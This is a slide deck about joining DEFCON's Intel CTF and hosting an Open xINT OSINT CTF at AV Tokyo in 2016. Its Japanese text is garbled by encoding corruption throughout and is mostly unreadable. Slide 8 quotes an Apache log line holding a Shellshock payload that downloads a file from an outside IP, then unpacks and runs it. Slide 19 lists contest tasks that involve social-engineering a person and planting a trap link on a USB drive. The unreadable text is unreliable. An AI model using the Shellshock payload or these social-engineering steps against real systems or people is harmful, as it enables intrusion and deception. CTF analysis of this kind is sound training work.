Slide 1

Slide 1 text

OSINTͷCTFʹ ࢀՃͯ͠։࠵ͨ͠࿩Ͱʂ 2016/12/20 #ssmjp @YuhoKameda ɹɹɹɹɹɹɹɹɹ @pinja_xyz

Slide 2

Slide 2 text

ࣗݾ঺հ ُా ༐า : ykame (@YuhoKameda) ZAP Evangelist OSINT ओͳۀ຿಺༰ WebΞϓϦέʔγϣϯ੬ऑੑ਍அ ϓϥοτϑΥʔϜ੬ऑੑ਍அ SOC/CSIRTۀ຿ ۓٸҊ݅ͳΜͰ΋ཁһ… ৘ใऩू

Slide 3

Slide 3 text

ࠓ೔࿩͢͜ͱ DEFCONͰIntel CTFʹࢀՃͨ͠࿩ AV TokyoͰOpen xINT CTFΛ։࠵ͨ͠࿩

Slide 4

Slide 4 text

DEFCONͰIntel CTFʹ ࢀՃͨ͠࿩

Slide 5

Slide 5 text

DEFCONͰIntel CTF DEFCONͬͯͳʔʹʁ ຖ೥ՆʹϥεϕΨεͰ։࠵ BlackHatʹଓ͚ͯ։࠵ ༷ʑͳCTF΍ίϯςετ͕͋ΔϋοΧʔ ͷࡇయ

Slide 6

Slide 6 text

DEFCONͰIntel CTF Intel CTFͬͯͳʔʹʁ 2015೥͔Β࢝·ͬͨɺIntelligenceʹয఺Λ౰ͯͨ ڝٕ ୈ2ճ(2016೥)ͷςʔϚ͸ɺੈքͷTop50ʹೖΔا ۀͷThreat Intelligence Analystͱͯ͠ɺ߈ܸऀΛ ௥੻͍ͯ͘͠աఔͰ༷ʑͳ໰୊Λճ౴͢Δ ༏উ৆ۚ͸$2,500 pinjaͰࢀՃʂ(@luminࢯɺ@awamori_ttࢯ + me) ݁Ռ͸12ҐͰͨ͠

Slide 7

Slide 7 text

Intel CTFͷ݁Ռ

Slide 8

Slide 8 text

ͲΜͳ໰୊͕͋ͬͨͷʔʁ 1໰໨ The Vuln: What is the vulnerability that was successfully exploited also "known" as? 4ϑΝΠϧܭ508ສߦͷApacheϩάͷத͔ Βɺ߈ܸʹ੒ޭͨ͠1ߦΛݟ͚ͭΔ XX.XX.XX.XX - - [21/Jul/2016:02:58:19 -0700] "GET /product/? id=2085 HTTP/1.0" 500 4958 "" "() { : ; }; /bin/bash -c 'wget -O / tmp/a.jpg http://52.37.125.215/ ; curl -o /tmp/a.jpg http:// 52.37.125.215/ ; tar -xzvf /tmp/a.jpg ; chmod 777 /tmp/* ; /tmp/a ; rm -rf /tmp/*'"

Slide 9

Slide 9 text

1໰໨ͷ౴͑͸ʁ What is the vulnerability that was successfully exploited also "known" as? ͳ͔ͳ͔౴͕͑߹Θͳ͍… Shellshock? shellshock?

Slide 10

Slide 10 text

1໰໨ͷ౴͑͸ʁ What is the vulnerability that was successfully exploited also "known" as? ͳ͔ͳ͔౴͕͑߹Θͳ͍… Shellshock? shellshock? Bashbug? CVE-2014-6271?

Slide 11

Slide 11 text

1໰໨ͷ౴͑͸ʁ What is the vulnerability that was successfully exploited also "known" as? ͳ͔ͳ͔౴͕͑߹Θͳ͍… Shellshock? shellshock? Bashbug? CVE-2014-6271? ౴͑͸ʮBashdoorʯ

Slide 12

Slide 12 text

ͦͷଞͷ໰୊ Ϛϧ΢ΣΞͷ௨৴ઌ͸ʁ ߈ܸݩIPͷASN(Autonomous System Number)͸ʁ ߈ܸݩIP͕ެ։͍ͯ͠ΔWebαʔόͷόʔδϣϯ͸ʁ Ϛϧ΢ΣΞͷ໊લ͸ʁ ࢖༻͕ແޮԽ͞Ε͍ͯΔؔ਺໊͸ʁ Ϙοτͷ໊લ͸ʁ Bot Harder͕࢖༻Δ͢ΔMaildrop͸ʁ

Slide 13

Slide 13 text

ଞʹ΋͋ΔSocial Engineering CTF(SECTF) ࣮ࡍͷاۀ΁ి࿩ͯ͠৘ใࡡऔ͢Δڝٕ Black Badge΋໯͑Δ໨ۄίϯςετ blog.yka.me Ͱɺ2015೥ͷ৘ใΛupͯ͠·͢ http://blog.yka.me/2015/08/social-engineering-ctfsectf-defcon-23.html

Slide 14

Slide 14 text

AV TokyoͰOpen xINT CTFΛ ։࠵ͨ͠࿩

Slide 15

Slide 15 text

AV Tokyoͬͯͳʔʹʁ ηΩϡϦςΟք۾ͷਓ͕ɺू·ͬͯҿΜ ͰɺൃදΛฉ͍ͯҿΜͰɺҿΉ ϋοΧʔίϛϡχςΟ no drink! no hack!

Slide 16

Slide 16 text

Ԡื·ͰͷྲྀΕ 8/6 20:00 ʮOSINTؔ܎ͷCTF͸೔ຊͰ΋΍Γ͍ͨͰ͢Ͷʯ ʮձࣾؔ܎ͩͱ಺༰͕… AVTokyoͷCFxͱ͔Ͳ͏Ͱ͠ΐ͏ʯ ʮʒ੾(8/15)͍ۙͰ͢Ͷɺམͪண͍ͨΒग़͠·͠ΐ͏͔ʯ 8/7 10:00 ɹɹʙ16:00 Intel CTFڝٕࢀՃ 8/8 13:19 writeupΛڞ༗ 8/8 22:26 Call For Xͷจষୟ͖୆ 8/12 Call For Xఏग़done

Slide 17

Slide 17 text

࣮ࡍʹ։࠵ͯ͠Έͨ 10/22 15:00 - 19:30 @ौ୩

Slide 18

Slide 18 text

Open xINT CTFͱ͸ʁ http://xintctf.wpblog.jp/ ձ৔Ͱͷؔ܎ऀ΁ͷฉ͖ࠐΈ΍SNSͳͲͰඞཁͳ৘ใΛऩ ू͠ɺ࣍ʑ໌Β͔ʹͳΔώϯτΛղ͖ͳ͕ΒຊؙʹͨͲΓ ண͘ɺݱ୅ͷεύΠཆ੒ίϯςετ ࢀՃऀ(εύΠ) ߈ܸऀΛௐࠪ (ผͷεύΠ) ߈ܸऀ(ϋοΧʔ) ઀৮ USB୳ࡧґཔ USBʹ᠘Λ࢓ࠐΜͰ઀৮ ಠࣗʹௐࠪ

Slide 19

Slide 19 text

໰୊͸7໰ 1. pinja.xyzͷ։ઃऀ(߈ܸऀ)ͷϝʔϧΞυϨε͸ʁ 2. ߈ܸऀ͕ॴ༗͢ΔFacebookΞΧ΢ϯτ͸ʁ 3. ߈ܸऀཱ͕ͪدͬͨ(ࣸਅ)ҿ৯ళͷ࠲ඪ͸ʁ 4. ߈ܸऀͱҰॹʹ৯ࣄ͍ͯ͠Δਓ(εύΠ)ͷFacebookΞΧ΢ϯτ ͸ʁ 5. ͜ͷਓ(εύΠ)Λࣸਅ͔Βಛఆ͠ɺAV Tokyo಺Ͱ઀৮ͯ͠ʮ͏· ͘৴༻ͤͯ͞ʯ৘ใΛҾ͖ग़ͤ 6. εύΠ͔ΒҾ͖ग़ͨ͠৘ใΛݩʹɺʮϞϊʯΛݟ͚ͭɺಘΒΕΔ ৘ใΛݟ͚ͭΖ 7. ͦͷϞϊʹ᠘ϦϯΫΛ࢓ֻ͚ɺʮෆ৹ʹࢥΘΕͳ͍Α͏ʯ߈ܸऀ ʹAV Tokyo಺ͰʮϞϊʯΛ౉ͤ

Slide 20

Slide 20 text

͋ΔʮϞϊʯ(USB)Λ୳ͯ͘͠Δ MAMORIOΞϓϦͰ൓ԠνΣοΫ http://www.mamorio.jp/ ΞϓϦͰ൓Ԡͷ͋ͬͨ෇ۙΛ୳͢

Slide 21

Slide 21 text

ৄ͘͠͸ࢀՃऀͷwriteupΛʂ ΤΫετϦʔϜCTF͸ͭΒ͍ʢOpen xINT ͷWriteup?ʣ http://pinksawtooth.hatenablog.com/ entry/2016/10/24/010049 Open xINT CTF Writeup http://qiita.com/nicklegr/items/ 5ebcdaac86a21613c94a

Slide 22

Slide 22 text

ࢀՃऀ਺ : 93ਓ 1໰Ͱ΋ղ͚ͨਓ : 67ਓճ౴෼෍ 1: 67ਓɺ2: 49ਓɺ3: 8ਓɺ4: 28ਓɺ5: 7ਓ

Slide 23

Slide 23 text

࠷ऴతͳ݁Ռ͸ʁ (700఺Ҏ্) [߹ܭ఺਺ + εύΠಘ఺ + ࠷ऴճ౴࣌ؒ] Sh1n0g1ɹ900 +ʢ100ʣ18:45:56 tigerszkɹ900 +ʢ100ʣ 19:20:49 rcsirtɹ900 +ʢ0ʣ17:16:36 nicklegrɹ700 +ʢ200ʣ17:39:52 brightblueɹ900 +ʢ0ʣ19:25:33 TomoriNaoɹ700 +ʢ100ʣ17:20:22 tonko2ɹ600 +ʢ100ʣ17:11:11 Sakura Ayaneɹ700 +ʢ0ʣ17:31:46 ໊લ͕ొ࿥໊ͱҰக͠ͳ͍ํ͸εύΠಘ఺͕0఺ͱͳΓ·͢ ಉ఺ͷ৔߹ɺ࠷ऴճ౴͕࣌ؒૣ͍ํ্͕Ґͱ͠·͢